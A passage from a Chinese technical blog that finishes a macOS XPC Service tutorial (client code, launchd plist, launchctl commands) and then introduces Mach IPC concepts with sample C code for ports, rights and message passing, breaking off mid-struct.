替换成如下调用 XPC 服务的代码，简单粗暴：

#import "XPCServiceProtocol.h"

int main(int argc, const char * argv[]) {
    // Try connect to XPC Service
    NSXPCConnection* _connectionToService = [[NSXPCConnection alloc] initWithServiceName:@"io.github.kiprey.XPCService"];
    _connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCServiceProtocol)];
    [_connectionToService resume];
    
    // Try using XPC Service interface
    [[_connectionToService remoteObjectProxy] upperCaseString:@"hello" withReply:^(NSString *aString) {
        // We have received a response. Update our text field, but do it on the main thread.
        NSLog(@"Result string was: %@", aString);
    }];
    
    // Wait for XPC Service response
    NSLog(@"Sleep 5s...");
    sleep(5);
    
    [_connectionToService invalidate];
    
    NSLog(@"Bye.");
}

需要注意的是：当调用者向 XPC Service 请求服务后，由于请求是异步执行的，因此执行到程序末尾后可能调用者还没有接收到 XPC Service 的返回结果，此时调用者需要等待，千万不能立即调用 invalidate 方法。

调用 invalidate 方法将会立即终止连接，不会等到 XPC Service 返回信息后再终止连接。

之后先编译 XPCService，再编译 Client。以下是执行结果：

b. 全局 XPC Service

上面那种方法简单说明了如何将 XPC Service 内嵌进 App 中并使用，启动和管理也较为方便。

但要是希望生成的 XPC Service 可以被任意程序调用，那该如何启动？

首先，编写一个 XPCDemo.plist，这种编写的 plist 称之为 launchd.plist。内容如下：

"1.0" encoding="UTF-8"?>
plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Labelkey>
  <string>io.kiprey.github.XPCDemostring>
  <key>Programkey>
  <string>/Users/kiprey/Desktop/Mach_test/XPCDemo/Build/Products/Debug/XPCDemo.xpc/Contents/MacOS/XPCDemostring>
  <key>KeepAlivekey>
  <true/>
  <key>POSIXSpawnTypekey>
  <string>Interactivestring>
  <key>MachServiceskey>
  <dict/>
dict>
plist>

其中指定了：

Label：即其他进程用于索引当前 XPC Service 的标签
Program：待被启动的守护进程的路径
KeepAlive：表示是否需要让 launchd 在该守护进程崩溃后重启
…

更多关于 lanchd.plist 的细节可以在 man launchd.plist 文档中找到，这里不再赘述。

之后，我们可以让 launchd 来启动并管理我们的 XPC Service。

原先是想将 XPCDemo.plist 文件拷贝进 /System/Library/LaunchDaemons 文件夹下，但是执行 cp 操作时，提示 Read-only file system，即该目标文件夹不允许写入操作。无论是关闭 SIP 还是执行sudo mount -uw / 以修改根路径的挂载权限，都无法写入该文件夹下。其他方式也不想再折腾了，因此放弃将该 plist 文件拷贝进 System Launch Daemons 文件夹的打算。

这种错误可能是因为目标文件夹是 /System 打头的路径。
但我们仍然可以将 plist 复制进 /Library/LaunchDaemons 文件夹中。

但即便我们不将 plist 文件复制进 Launch Daemons 文件夹下，我们依然可以让 launchd 来启动我们的 XPC Service：

首先，执行 chown 修改刚刚创建的 XPCDemo.plist 文件所有权
1
sudo chown root:wheel XPCDemo.plist
之后执行以下命令，使 launchd 启动目标程序
1
sudo launchctl bootstrap system XPCDemo.plist
当我们希望 launchd 关闭目标 XPC Service 时，执行以下命令
1
sudo launchctl bootout system XPCDemo.plist

当 launchd 开始管理我们的全局 XPC Service 后，如果该 XPC Service 异常崩溃，则 launchd 会每隔 10s 重启一次服务：

图中是之前测试时，XPCDemo 老是一开就挂，因此 Launchd 会每隔 10s 重启一次，并且一直重启下去。
log 查看命令：log show --predicate 'processID == 0' --last 1h | grep "XPC"

需要注意的是，单独使用 XCode 的 XPC Service 项目编译出的程序无法直接执行，因此不能挂在 launchd 下面跑，必须参照 Signing a Daemon with a Restricted Entitlement 将 XPC Service 以类 app 形式编译出一个可执行文件来。

5. NSXPC 架构

查看下面这张图，我们可以看到上面 [ServiceDelegate listener] 函数所做的就是设置 NSXPC Service 这方的 Exported Object。

而这张图说明了整个 XPC 通信的过程：

三、C-Stype XPC Service

当我们可以理解 Objective-C 的 XPC Service 后，C 风格的 XPC Service 也就更容易理解。

具体细节就不再赘述了，这里贴出两个 C-Stype XPC 的相关资料：

四、参考

MacOSX Mach IPC 入门

2021-12-23T16:00:00.000Z

一、简介

Mach，是一个面向通信的操作系统微内核，其基本工作单位为 task（而不是 process）。Mach 内核提供了一种 IPC 机制，而 XNU 的大多数服务也建立在 Mach IPC 和 Mach Task 上。

Mach 有多种抽象的基本概念，其中一部分分别是 task、thread、port、message、memory object。

Mach 微内核作为 MacOS XNU 内核的组成部分，接管了相当重要的一部分功能。其中最著名的莫过于 Mach IPC 进程间通信机制。

本人将在这里简单记录一下 Mach IPC 部分机理。

需要注意的是，这是本人第一次接触 Mach IPC，因此其中可能会有一部分陈述或者说明存在问题，还请各位师傅不吝指出。

二、Mach Task & Thread

Mach 将传统的 UNIX 进程抽象拆分成了 task 和 thread。其中：

task 是一个执行环境与静态实体。它并不直接执行计算，而是提供了一个框架，其他实体（例如线程）在其中执行。内核中的BSD 进程（类似 Unix 进程）与 Mach task 有着一一对应的关系。
task 还是资源分配的基本单元。那些与 BSD 进程所关联的资源被包含于 task 中。
同时每个 task 也代表了保护边界。在获取访问权限前，不同 task 不能访问其他的 task 中的资源。
thread 是 Mach 中实际执行的实体，也是 task 的控制流执行点。它在 task 的上下文中执行。
thread 执行的代码驻留在其 task 中的地址空间中。每个 task 中包含 0 至多个 thread。

通过上面的说明，我们也可以将 task 这个概念，间接理解成传统意义上的 process（是不是非常的相似:)）

需要注意的是：一旦创建了 task，那么任何持有着 task identifier 的用户都可以修改 task。

三、Mach Port

1. 概念

Mach Port 是受内核保护的单向 IPC 通道、功能和名称。在 Mach 内核中，mach port 被实现成一个有限长度且被内核所维护的消息队列，与 Linux Pipe 有些相似，都会因为队列满或者队列空而阻塞，其基本操作为发送和接收消息。该队列是多生产者、单消费者队列，只能有单个 receive right。

Port 的这种抽象以及相关的操作是 mach 通信的基础。一个端口有着与之相关联的内核管理权限，而每个 task 都必须拥有 port 的适当权限才能操作它。当一个 Mach Message 被发送至某个 task 中，只有具有接收权限的 Mach port 才能接收该 Message，并将其从队列中删除。

例如这种权限设置可以允许一些任务向给定的端口发送信息，或者指定一些任务可以接收到发送给它的信息。

mach port 在 Mach 中非常重要，它表示着对象的引用，代表了OS中各类服务、资源等抽象。在 Mach 内核中，相当多的数据结构、服务等等都用 mach port 表示；而用户也可以通过对应的 mach port 来访问到 tasks、threads以及 memory objects。

Mach port 的名称是一个整数，但与文件描述符不同， Mach 端口不会通过 fork 而隐式继承。

2. Port Right

每个 Mach Port 都有着对应 port 的权限（right），以下是 Mac OSX 所定义的部分 port right 类型：

MACH_PORT_RIGHT_SEND：表示权限拥有者可以向该端口发送信息
MACH_PORT_RIGHT_RECEIVE：表示权限拥有者可以从该端口中获取 Message
MACH_PORT_RIGHT_SEND_ONCE：表示发送方只能发送一次 Message。不管该权限是否被销毁，该句柄始终会发送一条消息。
MACH_PORT_RIGHT_PORT_SET：表示多个 port name 的集合，可以被看做是多个端口接收权限的集合。端口集可用于同时侦听多个端口，类似于 Unix epoll 机制等等。
MACH_PORT_RIGHT_DEAD_NAME：只是一个占位符。若某个端口的权限被销毁后，则该端口的所有现有句柄的权限都将转换成 dead name（即无效权限）。dead name 机制是为了防止所接管的端口名被过早重用。

若某个端口的接收权限被释放时，则将该端口视为被销毁。注意接收句柄在任何时候都只能有一个 task 所持有。

而端口权限名称（port right name）是某个 task 用来引用所持有的 port right 的特定整数值，有点类似文件描述符。需要注意的是每个port right name 只会在原始任务的上下文中有意义，这意味着即便将该名称发送给其他的任务，该任务也无法使用该名称访问对应的 mach port。（这也再次类似于文件描述符）

这个 port right name 正是我们日常见到最多的**用户层（注意必须指定是用户层）**中 mach_port_t 类型的值。
注意还有一个 port name（和 port right name 不一样），在用户层中是 mach_port_name_t 类型的值。

port name 和 right 的关系，类似于 Unix 中文件描述符和文件描述符权限的关系。但是，请勿直接将 right 等同于权限，mach port right 和权限二字仍然有着较大的差别。

四、Mach Message

Mach IPC message 是线程之间相互通信的数据对象，它也是 tasks 之间通信的典型方式。一个 Message 中可能包含实际的数据（即内联数据），或者包含指向外联数据（out-of-line，OOL）的指针；后者是针对大数据传输的一种优化。

Mach Message 由以下几个部分组成：

一个强制要有的消息头（mach_msg_header_t 类型）

typedef   struct 
{
  mach_msg_bits_t     msgh_bits;           // 一些消息标志位
  mach_msg_size_t     msgh_size;           // 消息 header + body + data 的总大小
  mach_port_t         msgh_remote_port;    // 目标 port right
  mach_port_t         msgh_local_port;     // 辅助 port right
  mach_port_name_t    msgh_voucher_port;
  mach_msg_id_t       msgh_id;            // 传递 mach msg 时不会使用该字段，用户可自行设置该字段
} mach_msg_header_t;

一个可选的消息 body （mach_msg_body_t 类型）
1
2
3
4
typedef struct
{
mach_msg_size_t msgh_descriptor_count;
} mach_msg_body_t;
注意，消息 body 并不只是这一个简简单单的结构体，请看下面的图。
用户待发送的数据 data
一个可选的 tailer（mach_msg_trailer_t 类型）。该字段只与发送方有关。这个我们将在下面讲到。

一个简单 Message 示例。其中 header.size 描述的是 header + data 的总大小：

一个复杂 Message 示例。与简单消息不同的是，复杂消息还包含了 body 信息，用以额外说明一些信息。

这个是更详细的说明图：

这是一个复杂 Message 的具体代码样例。其中 body 部分包括 msgBody 字段和 ports[1] 字段，待发送 data 部分为 notifyHeader 字段：

struct PingMsg {
    mach_msg_header_t           msgHdr;
    mach_msg_body_t             msgBody;
    mach_msg_port_descriptor_t  ports[1];
    OSNotificationHeader64      notifyHeader __attribute__ ((packed));
};

Message 的具体使用与机理将在下面使用中慢慢说明。

五、Mach API 入门使用

1. 单向 Mach 通信示例

*. 代码示例

以下是使用 Mach 低级 API 进行 IPC 的一个简单例子。

#include 
#include 
#include 
#include 
#include 
#include 

void sender() {
    // 从 bootstrap 中查询并获取一个 mach port
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("bootstrap_look_up() returned port right name %d\n", port);

    // 构造待发送的信息
    struct {
        mach_msg_header_t header;
        char texts[20];
        int integer;
    } message;

    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    message.header.msgh_remote_port = port;
    message.header.msgh_local_port = MACH_PORT_NULL;
    message.header.msgh_size = sizeof(message);

    strcpy(message.texts, "kiprey_texts");
    message.integer = 123;

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&message.header);
    assert(mr == KERN_SUCCESS);
    printf("message is sent.\n");
}

void receiver() {
    // 创建一个带有接收权限的 mach port
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("mach_port_allocate() created port right name %d\n", port);
    
    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert (kr == KERN_SUCCESS);
    printf("mach_port_insert_right() inserted a send right\n");

    // 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert (kr == KERN_SUCCESS);
    printf("bootstrap_register()'ed our port\n");

    // 等待 message
    struct {
        mach_msg_header_t header;
        char texts[20];
        int integer;
        mach_msg_trailer_t trailer;
    } message;

    message.header.msgh_size = sizeof(message);
    message.header.msgh_local_port = port;
    kr = mach_msg_receive(&message.header);
    assert (kr == KERN_SUCCESS);
    printf("Got a message\n");

    printf("Text: %s, number: %d\n", message.texts, message.integer);
}

int main(int argc, const char * argv[]) {
    if(fork() == 0) {
        // 等待 receiver 注册好 port 后再发送信息
        sleep(1);
        sender();
    }
    else {
        receiver();
    }
    return 0;
}

测试结果：

接下来将简单讲讲该例子中所调用的一些用户 API。

a. mach_port_allocate

初始时，接收端调用 mach_port_allocate 创建一个指定权限的 mach port：

1 2	mach_port_t port; kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);

该函数的定义如下：

1	kern_return_t mach_port_allocate(ipc_space_t task, mach_port_right_t right, mach_port_name_t *name)

其中，第一个参数指定当前进程所在的 task。有趣的是，这种指定 task 的方式也是通过传递一个 mach port name 来完成。以下是 task_self_trap 函数的源代码，mach_task_self 函数是该函数的 wrapper。

/*
 *  Routine:    task_self_trap [mach trap]
 *  Purpose:
 *      Give the caller send rights for his own task port.
 *  Conditions:
 *      Nothing locked.
 *  Returns:
 *      MACH_PORT_NULL if there are any resource failures
 *      or other errors.
 */

mach_port_name_t
task_self_trap(
    __unused struct task_self_trap_args *args)
{
    task_t task = current_task();
    ipc_port_t sright;
    mach_port_name_t name;

    sright = retrieve_task_self_fast(task);
    name = ipc_port_copyout_send(sright, task->itk_space);
    return name;
}

第二个参数指定当前待分配 Mach port 的 right，这里请求的是接收权限。根据 xnu 源码，该函数的第二个参数只有以下三种有效：

MACH_PORT_RIGHT_RECEIVE：创建一个新端口，且当前只有接收权限
MACH_PORT_RIGHT_PORT_SET：创建一个空的端口集，其中端口集里没有任何成员
MACH_PORT_RIGHT_DEAD_NAME ：创建一个新的 dead name

该函数的第三个参数指定 成功分配 port 时其所存放的位置，这个没啥好说的，略过。

b. mach_port_insert_right

作用：将指定的 port right 插入进当前 task 中。

例子中的使用方式：

1 2	// 给该 port 再增加一个发送权限 kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

其函数声明如下：

kern_return_t
mach_port_insert_right(
    ipc_space_t task,
    mach_port_name_t name,
    mach_port_t poly,
    mach_msg_type_name_t polyPoly)

在这个例子中，调用者会对新创建的 port （此时只有 receive right）添加上 send right。这里的 send right 指的是给当前 port 发送 mach message 的权限。

c. bootstrap_register/lookup

在 OSX 中，当一个新的 task 被创建时，它会被额外设置一组特殊的Mach port。其中包括：

主机端口（host port，itk_host），表示运行该任务的机器。该端口允许 task 获取有关内核和主机的信息。
任务端口（task port，itk_sself），即这个端口引用的任务是自己。这个端口不允许用于控制自生，貌似该端口只能用于获取 task info。
引导端口（bootstrap port，itk_bootstrap），连接到 bootstrap server（launchd）。

剩余的可以在 osfmk\mach\task_special_ports.h 中了解。

对应与 task 内核结构体中的字段如下：

/* IPC structures */
struct ipc_port *itk_self;  /* not a right, doesn't hold ref */
struct ipc_port *itk_nself; /* not a right, doesn't hold ref */
struct ipc_port *itk_sself; /* a send right */
struct exception_action exc_actions[EXC_TYPES_COUNT];
/* a send right each valid element  */
// host port
struct ipc_port *itk_host;  /* a send right */ 
// bootstrap port
struct ipc_port *itk_bootstrap; /* a send right */
// seatbelt port
struct ipc_port *itk_seatbelt;  /* a send right */
// seatbelt port
struct ipc_port *itk_gssd;  /* yet another send right */
// debug port
struct ipc_port *itk_debug_control; /* send right for debugmode communications */
// task_access port
struct ipc_port *itk_task_access; /* and another send right */ 
// resume port
struct ipc_port *itk_resume;    /* a receive right to resume this task */
// 注册端口, 可以调用 mach_ports_register 进行注册
struct ipc_port *itk_registered[TASK_PORT_REGISTER_MAX];
/* all send rights */

struct ipc_space *itk_space;

可以发现这些 struct ipc_port itk_* 都是特殊的 mach port，每个 task 都会被设置。

其中，itk_host、itk_bootstrap、itk_seatbelt、itk_gssd、itk_task_access 都是从 parent task 中继承。

对于 itk_registered 数组来说，用户可以使用 mach_ports_register 函数将目标端口注册进该数组中，并使用 mach_ports_lookup 进行查询。注册后的 port right 将会填充至 task 结构体中 itk_registered 数组的某个槽。

bootstrap server 提供一个 port namespace，task 可以在其中注册自己的端口，其他 task 可以查找并向其发送消息。

我们可以将 bootstrap server 看作一个电话簿：task 可以放置一个已知且被命名的值，以对应于该 task 正在监听的 Mach port。

若某个 task 需要向 bootstrap server 注册服务，则 task 可以使用 bootstrap_register() 函数，该函数接受字符串名称和与之关联的Mach端口。但需要主要的是，Mac OSX 在10.5中弃用了这个函数，因此在编译上面的例子时，编译器会报出一个 Deprecated 的 warnning。

不过，我们还可以使用 bootstrap_check_in 来取代 bootstrap_register 函数。

在这个例子中，接收方会将带有 send right 的 mach port 注册进 bootstrap 中；那么当发送方尝试向 bootstrap 申请获取接收方的 port 时，bootstrap 就可以将当前所注册的 mach port 的 send right 复制一份给发送方。

这样，发送方便有了该 mach port 的 send right，可以向该 port 发送数据。而 mach port 的另一端（也就是接收方）便可以直接读取到发送方发来的消息。

d. mach_msg

作用：发送 mach message 或者接收 mach message。在这个例子中，发送方和接收方都会间接调用到这个函数来发送或者接收 mach msg。

我们先简单看看 mach_msg 函数的定义，了解该函数各个参数的作用或功能，内核的具体处理方式将在后面讲到。

mach_msg_return_t
mach_msg(msg, option, send_size, rcv_size, rcv_name, timeout, notify)
    mach_msg_header_t *msg;    // 指向 Mach message 的指针
    mach_msg_option_t option;  // 一些基础标志，例如 MACH_SEND_MSG 或 MACH_RCV_MSG 标志以指定消息是发送还是接收
    mach_msg_size_t send_size; // 待发送的消息长度
    mach_msg_size_t rcv_size;  // 待接收的消息长度
    mach_port_t rcv_name;      // 接收消息的 port 
    mach_msg_timeout_t timeout;// 指定 mach_msg 最长等待时间
    mach_port_t notify;        // 一个通知 port，用于接收通知信息

mach_msg_return_t
mach_msg_send(mach_msg_header_t *msg)
{
    return mach_msg(msg, MACH_SEND_MSG,
            msg->msgh_size, 0, MACH_PORT_NULL,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

mach_msg_return_t
mach_msg_receive(mach_msg_header_t *msg)
{
    return mach_msg(msg, MACH_RCV_MSG,
            0, msg->msgh_size, msg->msgh_local_port,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

对于发送方而言，发送方需要指定 header 的一些字段：

message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); // 设置下面对应 port 的 mach 信息类型
message.header.msgh_remote_port = port;          // 设置发送端口为目标 port
message.header.msgh_local_port = MACH_PORT_NULL; // 没有辅助端口
message.header.msgh_size = sizeof(message);

2. 双向 mach 通信示例

上面的例子已经为我们展示了单向 mach 通信的基本方式（sender-> receiver）。接下来尝试让receiver也能发送数据给sender，实现双向通信。

需要注意的是， mach 是单向通信，因此必须让 sender 再创建一个新的 port（即 sender 持有新 mach port，注意此时 receiver 已经持有了一个旧的 mach port），并让 receiver 持有该 port 的 send right 才能实现双向通信。而这就涉及到一个问题：如何传递 mach port right？

一种解法是，再次利用 bootstrap 做中转，这确实是一个解决方法，但是不够优雅。实际上，因为此时的 sender 是可以通过已有的 mach port 将信息发送给 receiver，因此我们可以利用这个 mach port ，将新的 mach port 的 send right 发送给 receiver。

因为 Mach message 是支持传输 port right 的。

以下是整个通信的完整过程，其中 bob 是 sender, alice 是 receiver：

现在的问题是，如何把权限发送过去？我们分别看看两种不同的方式。

a. reply port

1) sender

当 sender 从 bootstrap 中获取到了 receiver mach port 的 send right 后，sender 便可以给 receiver 发送信息。这是之前的 message header 设置方式：

1
2
3

message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */0);
message.header.msgh_remote_port = port;
message.header.msgh_local_port = MACH_PORT_NULL;

但在这里，我们将使用一个新的 message 方式：

在 msgh_bits 中额外设置 local port 的 right 为 MACH_MSG_TYPE_MAKE_SEND_ONCE，这会使得对端只能向该端口发送一次信息。
在 msgh_local_port 字段中放入本地自己新建立的 replyPort 端口。

message.header.msgh_bits = MACH_MSGH_BITS_SET(
    /* remote */ MACH_MSG_TYPE_COPY_SEND,
    /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE,
    /* voucher */ 0,
    /* other */ 0);
// 注： 上面这条语句等价于 
// message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE);

message.header.msgh_remote_port = port;

// 与之前单向通信设置 MACH_PORT_NULL 不同，这里设置了一个 sender 自己创建并带有 send right 的 mach port
message.header.msgh_local_port = replyPort;

那么此时再使用 mach_msg 发送这条 message，则 sender 发送来的信息中将包含一个 replyPort。

这个 replyPort 有什么用呢？事实上，对面的 receiver 将会通过这个传过去的 replyPort，向这边的 sender 发送信息。

注意所设置的 message.header.msgh_bits，其中 local 部分对应的是 MACH_MSG_TYPE_MAKE_SEND_ONCE，这意味着 replyPort 只能被 receiver 使用一次 send 操作。

2) receiver

当 receiver 接收 message 时，sender 发送信息时的 remote_port 和 local_port，分别一一对应于 receiver 所接收到 message 中的 local_port 和 remote_port。

因此此时 receiver 方的 message 中 remote_port 不会是 MACH_PORT_NULL，而是先前设置的 replyPort。

因此接下来 receiver 便可以通过这个 replyPort 向 sender 发送信息。但需要注意的是，在发送信息给 replyPort 时，其 message.header.msgh_bits 字段，必须设置成 MACH_MSG_TYPE_MAKE_SEND_ONCE，即和发送该端口过来时所设置的位一致。

因为受到发送 replyPort 方（即 sender 方）的设置或者限制， receivier 方只能发送一次信息至 replyPort 中。

3) 代码示例

以下是完整的代码实现：

#include 
#include 
#include 
#include 
#include 
#include 

struct mach_msg_send_t {
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
};

struct mach_msg_receive_t {
    struct mach_msg_send_t recv_content;
    mach_msg_trailer_t trailer;
};

void sender()
{
    // 从 bootstrap 中查询并获取一个 mach port
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // 构造待发送的信息
    struct mach_msg_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm sender.");
    send_msg.integer = 1;

    // 新建立一个 receiver 发送的 replyPort
    mach_port_t replyPort;
    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &replyPort);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_allocate() created port right name %d\n", replyPort);

    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_insert_right() inserted a send right\n");

    // 注意这里，remote port 的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE
    send_msg.header.msgh_bits           = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    send_msg.header.msgh_remote_port    = port;
    send_msg.header.msgh_local_port     = replyPort;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");

    // 等待 message
    struct mach_msg_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = replyPort;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[sender] Got a Message\n");
    printf("[sender] Text: %s | number: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer);
}

void receiver()
{
    // 创建一个带有接收权限的 mach port
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_allocate() created port right name %d\n", port);

    // 给该 port 再增加一个发送权限
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] mach_port_insert_right() inserted a send right\n");

    // 将该端口的 send right 发送给 bootstrap，这样就可以被其他进程所查询
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] bootstrap_register()'ed our port\n");

    // 等待 message
    struct mach_msg_receive_t recv_msg;
    recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
    recv_msg.recv_content.header.msgh_local_port    = port;
    kr = mach_msg_receive(&recv_msg.recv_content.header);
    assert(kr == KERN_SUCCESS);
    printf("[receiver] Got a Message\n");
    printf("[receiver] Text: %s | number: %d | remote_port: %d\n", recv_msg.recv_content.texts, recv_msg.recv_content.integer, recv_msg.recv_content.header.msgh_remote_port);

    struct mach_msg_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm receiver.");
    send_msg.integer = 2;

    // 注意这里的发送权限是 MACH_MSG_TYPE_MAKE_SEND_ONCE
    send_msg.header.msgh_bits           = recv_msg.recv_content.header.msgh_bits & MACH_MSGH_BITS_REMOTE_MASK;
    send_msg.header.msgh_remote_port    = recv_msg.recv_content.header.msgh_remote_port;
    send_msg.header.msgh_local_port     = MACH_PORT_NULL;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // 将其发送
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[receiver] Message is sent.\n");
}

int main(int argc, const char *argv[])
{
    if (fork() == 0)
        sender();
    else
        receiver();
    return 0;
}

执行效果：

那么可能会有疑问，为什么 replyPort 的 msg 类型要设置成 MACH_MSG_TYPE_MAKE_SEND_ONCE？能不能设置成 MACH_MSG_TYPE_COPY_SEND ？实际上是可以的，并且后者可以允许 receiver 多次向 replyPort 发送 mach message，而不是只有一次。

b. complex message

还记得之前描述 Mach Message 的结构么？Mach message 既可以传递简单信息（即之前的那些示例）又可以传递复杂信息（即接下来要讲的）。现在，我们将尝试使用复杂 mach message 来传递一个通信 mach port。

为了简化说明，这里假设上面的内容已经完全理解。

1) sender

现在， sender 需要尝试将自己新建好的 replyPort（已完成包括 alloc, insert right 等操作）发给 receiver，那该怎么做呢？

其实可以直接在消息主体中，传递端口描述符。这里需要先引入一下待发送的 mach msg 结构类型定义：

typedef struct {
  mach_msg_header_t header;
  mach_msg_size_t msgh_descriptor_count;
  mach_msg_port_descriptor_t descriptor;
} mach_msg_complex_send_t;

其中，header 自不必说；msgh_descriptor_count 说明接下来将会有多少个 descriptor；而mach_msg_port_descriptor_t 类型的 descriptor 字段将会描述一些关于待传递 port 的信息。

每个 descriptor 不管是什么类型，都会占用 40 字节。以下是最原始的 descriptor 的类型声明：

typedef struct{
    natural_t                     pad1;
    mach_msg_size_t               pad2;
    unsigned int                  pad3 : 24;
    mach_msg_descriptor_type_t    type : 8;
} mach_msg_type_descriptor_t;

而端口描述符的定义如下：

typedef struct{
  mach_port_t                   name;
  mach_msg_size_t               pad1;
  unsigned int                  pad2 : 16;
  mach_msg_type_name_t          disposition : 8;
  mach_msg_descriptor_type_t    type : 8;
} mach_msg_port_descriptor_t;

其中

name：待传递的 port。这里要设置为 replyPort

disposition：待传递 port 的 right。这里设置为 MACH_MSG_TYPE_PORT_SEND

一共有以下几种：

/*
 *  Values received/carried in messages.  Tells the receiver what
 *  sort of port right he now has.
 *
 *  MACH_MSG_TYPE_PORT_NAME is used to transfer a port name
 *  which should remain uninterpreted by the kernel.  (Port rights
 *  are not transferred, just the port name.)
 */

#define MACH_MSG_TYPE_PORT_NONE         0

#define MACH_MSG_TYPE_PORT_NAME         15
#define MACH_MSG_TYPE_PORT_RECEIVE      MACH_MSG_TYPE_MOVE_RECEIVE
#define MACH_MSG_TYPE_PORT_SEND         MACH_MSG_TYPE_MOVE_SEND
#define MACH_MSG_TYPE_PORT_SEND_ONCE    MACH_MSG_TYPE_MOVE_SEND_ONCE

type：待传递的类型。这里要设置为 MACH_MSG_PORT_DESCRIPTOR

由于 descriptor 的类型不只是端口描述符一种，因此需要显式为 descriptor 指定类型，以便于内核处理。共有以下几种类型：

#define MACH_MSG_PORT_DESCRIPTOR                0
#define MACH_MSG_OOL_DESCRIPTOR                 1
#define MACH_MSG_OOL_PORTS_DESCRIPTOR           2
#define MACH_MSG_OOL_VOLATILE_DESCRIPTOR        3
#define MACH_MSG_GUARDED_PORT_DESCRIPTOR        4

代码示例：

send_msg.msgh_descriptor_count      = 1;
send_msg.descriptor.name            = replyPort;
send_msg.descriptor.disposition     = MACH_MSG_TYPE_PORT_SEND;
send_msg.descriptor.type            = MACH_MSG_PORT_DESCRIPTOR;

最后执行 mach_msg_send 之前，别忘记向 msgh_bits 字段中添加 MACH_MSGH_BITS_COMPLEX，以指定该信息为复杂信息。否则这些描述符只会被解释成内联信息。

1 2	// 注意这里，要指定待发送的信息格式为 complex send_msg.header.msgh_bits = MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX);

2) receiver

接收端只需接收发送端发来的数据，并取出端口描述符中的 port name，即可开始通信。

要做的事情较为简单：

// 等待 message
mach_msg_complex_receive_t recv_msg;
recv_msg.recv_content.header.msgh_size          = sizeof(recv_msg);
recv_msg.recv_content.header.msgh_local_port    = port;
kr = mach_msg_receive(&recv_msg.recv_content.header);

mach_msg_simple_send_t send_msg;
strcpy(send_msg.texts, "Hello, I'm receiver.");
send_msg.integer = 2;

send_msg.header.msgh_bits           = recv_msg.recv_content.descriptor.disposition;
send_msg.header.msgh_remote_port    = recv_msg.recv_content.descriptor.name;
send_msg.header.msgh_local_port     = MACH_PORT_NULL;
send_msg.header.msgh_size           = sizeof(send_msg);

// 将其发送
mach_msg_return_t mr = mach_msg_send(&send_msg.header);

3) 代码示例

示例代码如下：

#include 
#include 
#include 
#include 
#include 
#include 

typedef struct {
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
} mach_msg_simple_send_t;

typedef struct {
    mach_msg_simple_send_t recv_content;
    mach_msg_trailer_t trailer;
} mach_msg_simple_receive_t;

typedef struct {
  mach_msg_header_t header;
  mach_msg_size_t msgh_descriptor_count;
  mach_msg_port_descriptor_t descriptor;
} mach_msg_complex_send_t;

typedef struct {
    mach_msg_complex_send_t recv_content;
